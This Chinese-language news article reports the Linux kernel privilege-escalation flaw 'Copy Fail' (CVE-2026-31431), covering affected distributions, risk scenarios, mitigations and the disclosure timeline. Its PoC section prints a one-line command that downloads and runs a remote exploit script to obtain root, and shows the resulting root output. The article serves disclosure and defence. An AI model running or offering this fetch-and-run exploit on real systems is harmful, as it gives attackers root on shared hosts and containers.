732字节通杀Linux:史诗级漏洞潜伏近十年
🚨 史诗级漏洞:732 字节通杀所有 Linux,近十年潜伏
一个名为“Copy Fail”的 Linux 内核漏洞(CVE-2026-31431)被公开披露:
- 732 字节的 Python 脚本
- 100% 可靠,无需竞态窗口或内核偏移
- 影响所有 Linux 发行版(2017 年至今)
- 容器逃逸原语,跨租户攻击
- 近十年潜伏,直到 2026 年 4 月 29 日公开
同一个脚本在Ubuntu、RHEL、Amazon Linux、SUSE上都有效——无需修改。
🎯 漏洞核心
单一逻辑缺陷
Copy Fail 是一个直线逻辑缺陷:
- 不需要竞态窗口:不像大多数 Linux LPE 需要竞态
- 不需要内核偏移:不需要内核特定的偏移量
- 100% 可靠:每次都成功
- 同一个脚本:在所有发行版上都有效
漏洞链
Copy Fail 的攻击链:
- authencesn 逻辑错误:一个逻辑 bug
- AF_ALG:通过内核 crypto API
- splice():链式调用
- 4 字节 page-cache 写入:最终攻击原语
- 近十年可利用:从 2017 年到补丁发布
📊 受影响范围
官方验证的发行版
| 发行版 | 内核版本 | 状态 |
|---|---|---|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws | ✅ 已验证 |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 | ✅ 已验证 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 | ✅ 已验证 |
| SUSE 16 | 6.12.0-160000.9-default | ✅ 已验证 |
其他受影响发行版
以下发行版同样受影响:
- Debian
- Arch Linux
- Fedora
- Rocky Linux
- AlmaLinux
- Oracle Linux
- 嵌入式 Linux
结论:如果你的内核在 2017 年到补丁之间构建——你受影响。
💡 高危场景
| 场景 | 风险 | 影响 |
|---|---|---|
| 多租户 Linux 主机 | 高 | 任何用户变成 root |
| Kubernetes / 容器集群 | 高 | 跨容器、跨租户攻击 |
| CI Runner / Build Farm | 高 | PR 变成 runner 的 root |
| Cloud SaaS 运行用户代码 | 高 | 租户变成 host root |
| 标准 Linux 服务器 | 中 | 内部 LPE,可链式攻击 |
| 单用户笔记本 | 低 | 后渗透提权步骤 |
🔧 缓解措施
方案 1:更新内核(推荐)
更新内核到包含mainline commit a664bf3d603d的版本:
- 修复内容:撤销 2017 年的 algif_aead in-place 优化
- 效果:page-cache 页面不再出现在可写 destination scatterlist
- 状态:大多数主流发行版已发布补丁
方案 2:禁用 algif_aead 模块(临时)
# 禁用 algif_aead 模块 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true
禁用 algif_aead 的影响
| 组件 | 影响 |
|---|---|
| dm-crypt / LUKS | 不影响 |
| kTLS / IPsec | 不影响 |
| OpenSSL / SSH | 不影响 |
| AF_ALG 用户空间 | 可能影响 |
结论:对大多数系统,禁用 algif_aead没有明显影响。
方案 3:seccomp 阻止 AF_ALG
对于不受信任的工作负载(容器、沙箱、CI),通过 seccomp 阻止 AF_ALG socket 创建:
# 检查 AF_ALG 使用 lsof | grep AF_ALG ss -xa
🚀 PoC 演示
漏洞 PoC 已公开,供 defenders 验证系统:
快速运行
$ curl https://copy.fail/exp | python3 && su # id uid=0(root) gid=1002(user) groups=1002(user)
PoC 详情
- 文件大小:732 字节
- 语言:Python 3.10+ stdlib only(os, socket, zlib)
- 默认目标:/usr/bin/su
- SHA256:a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
警告:脚本修改 setuid binary 的 page cache;更改重启后不持久,但 root shell 是真实的。不要在生产环境运行。
📅 披露时间线
| 日期 | 事件 |
|---|---|
| 2026-03-23 | 报告给 Linux kernel security team |
| 2026-03-24 | 初始确认 |
| 2026-03-25 | 补丁提议和审核 |
| 2026-04-01 | 补丁提交到 mainline |
| 2026-04-22 | CVE-2026-31431 分配 |
| 2026-04-29 | 公开披露 |
🔍 发现者:Xint Code
漏洞由Xint Code发现:
- 扫描时间:约 1 小时扫描 Linux crypto/ subsystem
- 发现方式:AI 驱动的代码审计
- 完整分析:root cause、diagrams、operator prompt
- 其他发现:同时发现其他高严重性漏洞,仍在协调披露中
Xint Code 战绩
- 0-day RCE:ZeroDay Cloud,扫荡数据库类别(Redis、PostgreSQL、MariaDB)
- DARPA AIxCC Top 3:DARPA AI Cyber Challenge 决赛
- DEF CON CTF 9×:DEF CON CTF 历史最获胜团队
📝 总结
Copy Fail(CVE-2026-31431)是史诗级 Linux 内核漏洞:
- 732 字节通杀所有 Linux(2017 年至今)
- 100% 可靠,单一逻辑缺陷
- 容器逃逸,跨租户攻击
- 近十年潜伏,直到 2026 年 4 月 29 日公开
- 高危场景:多租户主机、容器集群、CI Runner、SaaS
- 缓解:更新内核或禁用 algif_aead
- 发现者:Xint Code,AI 驱动代码审计
近十年的史诗级漏洞,一个脚本通杀所有 Linux。
漏洞官网:https://copy.fail
GitHub PoC:https://github.com/theori-io/copy-fail-CVE-2026-31431
技术分析:https://xint.io/blog/copy-fail-linux-distributions
Kernel 补丁:https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
itadol5j
暂无介绍....
延伸阅读:
一行命令干翻5个API!阿里云百炼CLI开源,Agent水电煤之战正式开打
5月29日,阿里云干了一件让 Agent 开发者集体高潮的事——百炼核心能力正式 CLI 化,一行命令就能让 AI Ag...
20亿用户握手!PayPal钱包正式接入微信支付,老外来华扫码时代到了
5月27日,支付圈传出来一个让人眼前一亮的消息:腾讯财付通全球与 PayPal World 正式达成合作,PayPal ...
支付宝杭州扔下王炸:3亿笔智能体支付已跑通,AI付Token Pay四件套定义新范式
5月26日下午,支付宝在杭州未来科技城国际会议中心办了一场叫"AI 支付生态大会"的活动。表面看是常规的产品发布会,实际...
渗透圈一夜变天!Xalgorix 22阶段全自动 AI 攻击平台开源,国产模型直接接
渗透测试这行最累的是什么?不是写报告,是重复劳动——侦察、目录爆破、注入点测试、SSRF 验证、CORS 检查……一个标...
Claude Mythos 企业版挖出超1万高危漏洞:Anthropic 联手13家巨头建AI安全联盟
Anthropic 最近搞了个大动作,但这次不是发新模型那么简单。4月7日,它联合了一串你可能做梦都想不到会站在一起的公...